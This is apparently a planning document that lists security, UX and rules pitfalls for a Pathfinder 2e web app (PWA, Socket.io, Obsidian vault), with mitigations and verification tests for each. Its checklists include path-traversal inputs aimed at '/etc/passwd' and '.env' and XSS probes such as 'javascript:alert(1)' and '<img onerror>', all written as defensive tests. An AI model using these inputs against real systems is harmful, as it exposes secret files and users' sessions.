Vault path from wikilink not sanitized	Read of `/etc/passwd` or `.env`	Resolve+verify path starts with vault root; whitelist extensions
JWT in localStorage XSS-readable	Stolen token	Already a known risk; mitigate via CSP, sanitize all user-rendered content. Future: HttpOnly cookie + CSRF
Level-up endpoint accepts arbitrary level value	Player jumps from level 4 to level 20	Server validates level == currentLevel + 1; level-up requires GM approval flag if going up multiple
Push notification body contains sensitive data (HP, location)	Notification visible on lock screen leaks info	Generic notification body ("Eine Aktion erwartet dich"), details only after app open
Unrestricted vault file size read	OOM via 1GB markdown file	Cap read at 5MB, refuse larger; report file too large gracefully
Display URL shareable	Anyone with URL sees the battle	Display URL contains short-lived token, expires when battle ends

UX Pitfalls

Pitfall	User Impact	Better Approach
Push permission prompt on first load	User reflexively denies → stuck on denied	Ask after explicit user opt-in tap, show why
"Update available" banner during active battle	Disrupts session if reload triggered	Suppress during active battle; queue for after
Level-up UI loses state on accidental tab close	Player redoes 20 minutes of choices	Persist wizard state every step; reload resumes
Dice roll result appears in chat but page is on different tab	Player misses the outcome	Service Worker push + tab title flash + sound (opt-in)
Display screen shows last-frame after disconnect	GM thinks display is fine, players see frozen state	Disconnect overlay on display screen with reconnect indicator
Vault note rendering shows raw `[[wikilinks]]` on parse failure	Player sees broken syntax	Graceful fallback: render as text + warning icon, not as broken markdown
Wake lock on always	Phone overheats, battery drains	Wake lock only during active turn; release on turn end
Boost UI accepts duplicate boost in same set	Player applies all 4 to STR	Greyed out / disabled state with tooltip explaining why
Cached character sheet offline shows old HP	Player thinks they have HP they don't	Mark as "Offline — letzte Aktualisierung vor X Min"

"Looks Done But Isn't" Checklist

Things that appear complete in dev but fail in real use.

PWA Install: Often missing maskable icons, splash screens, and apple-touch-icon — verify on real iOS + Android, not just Lighthouse
Web Push: Often missing 410-Gone cleanup — verify expired subs are pruned by sending a test push to a re-installed browser
Offline mode: Often missing offline auth fallback — verify cold-load on airplane mode shows app, not login error
Service Worker update: Often missing manual update prompt — verify deploy of new version doesn't auto-reload mid-session
Display screen: Often leaks GM data via unfiltered WebSocket frames — verify with socket.onAny(console.log) in incognito
Dice rolls: Often computed client-side — verify server-side roll by intercepting the fetch and changing the result; UI must reject
Chat markdown: Often allows javascript: URLs — verify [click](javascript:alert(1)) is neutralized
Level-up boost: Often missing 18-cap rule — verify boosting a stat at 18+ adds +1, not +2
Level-up undo: Often loses dependent feats — verify retraining a prereq feat surfaces broken downstream feats
Skill increase: Often loses history — verify undo of a level-15 increase knows which skill was chosen
Wikilink resolution: Often picks first match silently — verify ambiguous links are surfaced
Embed loops: Often crash on cyclic vault — verify with a deliberately cyclic test vault
Path traversal: Often allows .. — verify ?path=../../server/.env is rejected
Reconnect: Often loses missed messages — verify chat sent during a 30s disconnect appears after reconnect
Push payload: Often contains sensitive data — verify lock-screen notification doesn't leak HP/location
Backups: Often missing for VAPID keys + JWT_SECRET — verify they're in the .env.example doc and the deployment runbook

Recovery Strategies

When pitfalls slip through, here's how to recover.

Pitfall	Recovery Cost	Recovery Steps
VAPID key lost / rotated	HIGH	Notify all users; ask each to disable + re-enable notifications in settings (resubscribes); accept silent failure for users who don't act
Cache leaks user data across logins	MEDIUM	Force SW unregister via remote-config flag; client clears all caches on next load; bump SW version to invalidate; rotate JWT secret if data leak suspected
Level-up corrupted character (boost cap or feat dep)	HIGH	Append-only history table is the lifeline: replay history with corrected logic; if no history, manual GM correction via admin UI
Display screen showed GM data	HIGH	Audit server logs for affected battles; rotate display tokens; review WebSocket payloads with a recorded session capture
Cheated dice roll detected post-hoc	MEDIUM	Rolls persisted server-side: GM can review log, retroactively correct the affected encounter
Reconnect lost chat message	LOW	REST endpoint `since=lastSeenId` lets client refetch on reconnect; user can scroll back
SW cached old broken JS that breaks app	MEDIUM	Add a `/api/health/version` check; if returned version differs from SW-cached version + threshold, force unregister + reload
Wikilink resolution broken across vault rename	LOW	Re-index vault on detection; show "linked notes have moved" warning
Embed loop hung the tab	LOW	Hard reload; future loads use cycle detection (one-time fix)

Pitfall-to-Phase Mapping

How roadmap phases should address these pitfalls.

Pitfall	Prevention Phase	Verification
1. SW cache leaks user data	PWA	Multi-user shared device test passes
2. Mid-session SW force update	PWA	Deploy during active local battle test — no reload
3. iOS push silent failure	PWA	iOS PWA install + receive-push test on real device
4. VAPID key loss	PWA	`.env.example` documents key persistence; backup runbook exists
5. Display screen GM-data leak	Battle-Multi-Screen	DevTools-on-display test sees no GM-only fields
6. Client-side dice tampering	Dice/Chat	Forge a result client-side, server rejects
7. Markdown chat XSS	Dice/Chat	Inject `<img onerror>` and `[click](javascript:...)`, both neutralized
8. Boost 18-cap	Level-Up	Unit test: boost STR 18 → STR 19 (not 20)
9. Recompute side effects	Level-Up	Test: level-up at low HP doesn't reset HP to max
10. Feat retrain orphans	Level-Up	Retrain prereq feat → dependent feats flagged
11. Skill increase history	Level-Up	Test: undo level-15 increase knows which skill
12. Wikilink ambiguity	Obsidian	Test vault with two same-basename notes; ambiguity surfaced
13. Embed loops	Obsidian	Cyclic vault test renders without hang
14. Vault path traversal	Obsidian	`?path=../../etc/passwd` rejected
15. Socket.io message ordering	Battle-Multi-Screen + Dice/Chat (cross-cutting)	30s disconnect test: missed events recovered
16. Cascading deletes	All phases adding tables	Schema review: every `onDelete` documented
17. Per-event JWT overload	Cross-cutting (touched in every event-adding phase)	Profiler shows JWT verify count = connection count, not event count
18. WebSocket room leaks	Battle-Multi-Screen	Memory profile over 24h shows no monotonic growth
19. Mobile sleep / push wakeup	PWA / Mobile-First polish	Push tap deep-link reaches correct page on cold start
20. Reconnect storm	Battle-Multi-Screen + PWA	Wi-Fi flap test with 5 clients; staggered reconnect
21. Manifest icon traps	PWA	Install on real iOS + Android; icons render correctly
22. Chat/roll index	Dice/Chat	EXPLAIN ANALYZE on paginated query shows index use
23. Offline auth fallback	PWA	Airplane mode cold load shows app, not login error
24. Display aspect ratio	Battle-Multi-Screen	Test on actual table screen
25. GM bulk-action footgun	GM-Live-Tools	Destructive action requires confirmation; undo works

Cross-Cutting: Phases that Cannot Be Skipped Without Pain

Three patterns must be present in every phase of this milestone:

WebSocket discipline. Each new event needs: server-side validation → server-side persist (if historical) → broadcast (if needed) → client-side reconcile-on-reconnect. Gateway is the bottleneck — make it boringly consistent.
PostgreSQL referential thinking. Each new table needs: explicit onDelete decision, composite indexes for query patterns, transaction wrapping for multi-table writes. The CharactersService (1454 lines, no tests, no transactions) is the cautionary tale.
Test coverage on critical paths. The codebase has zero tests today. Every pitfall above is detectable by a test. The level-up math, the dice parser, the wikilink resolver, the path-traversal guard — these are ALL pure functions or near-pure functions. Test them. The death-spiral logic in HP/Dying/Wounded is already a flagged risk in CONCERNS.md; level-up adds another such mechanism. Don't ship pitfall-prone code with no test net.

Sources

PWA / Service Worker / Cache:

iOS Web Push:

Web Push / VAPID:

Wake Lock / Battery:

Socket.io:

PF2e Rules:

Obsidian / Wikilinks:

Markdown XSS:

Prisma / Postgres:

Internal context:

.planning/PROJECT.md
.planning/codebase/CONCERNS.md (HP/Dying race, oversized service, missing tests, gateway auth minimal)
.planning/codebase/TESTING.md (zero test coverage today — directly motivates the cross-cutting test discipline above)

Pitfalls research for: Dimension47 milestone — PWA + multi-screen battle + extended Socket.io + Obsidian read-only vault + full PF2e Level-Up Researched: 2026-04-27

56 KiB Raw Blame History Unescape Escape

Pitfalls Research

Critical Pitfalls

Pitfall 1: Service Worker caches an authenticated API response and serves it to the wrong user after logout/re-login

Pitfall 2: Service Worker + Socket.io mid-game force-update interrupts an active battle session

Pitfall 3: iOS Safari PWA push notifications silently fail because the install path or manifest is wrong

Pitfall 4: VAPID key gets lost or rotated → all existing push subscriptions silently break

Pitfall 5: Display-mode (table screen) leaks GM-only data because role-checks live in components, not in the data layer

Pitfall 6: Client-side dice rolls are tampered/spoofed — players can claim any result

Pitfall 7: Markdown chat messages enable XSS via raw HTML or javascript: URLs

Pitfall 8: PF2e Level-Up — boost rules at-18 cap silently break ability scores

Pitfall 9: PF2e Level-Up — recompute side effects (HP cap, AC, saves) corrupt current state

Pitfall 10: PF2e Level-Up — undo/retrain creates orphaned feat dependencies

Pitfall 11: PF2e Level-Up — skill increase tracking forgets which skills were already increased at which level

Pitfall 12: Obsidian wikilinks resolve ambiguously to the wrong note

Pitfall 13: Obsidian embed loops cause stack overflow / infinite render

Pitfall 14: Vault path traversal allows reading files outside the vault root

Pitfall 15: Socket.io message ordering breaks on reconnect; Connection State Recovery not enabled

Moderate Pitfalls

Pitfall 16: Cascading deletes wipe historical data unintentionally

Pitfall 17: Per-event JWT validation overloads the gateway

Pitfall 18: WebSocket room cleanup leaks on disconnect

Pitfall 19: Mobile device sleeps during session, missing push and breaking WebSocket

Pitfall 20: Reconnect storm when Wi-Fi at the table flaps

Minor Pitfalls

Pitfall 21: Manifest icon traps (maskable, sizes, splash)

Pitfall 22: Chat/roll history queries are not indexed for time-paginated reads

Pitfall 23: "Offline" PWA shows login screen because auth check fails offline

Pitfall 24: Display screen aspect ratio mismatch on the table-embedded screen

Pitfall 25: GM-tool safety — accidental "set HP to 0 for all party"

Technical Debt Patterns

Integration Gotchas

Performance Traps

Security Mistakes

UX Pitfalls

"Looks Done But Isn't" Checklist

Recovery Strategies

Pitfall-to-Phase Mapping

Cross-Cutting: Phases that Cannot Be Skipped Without Pain

Sources

56 KiB

Raw Blame History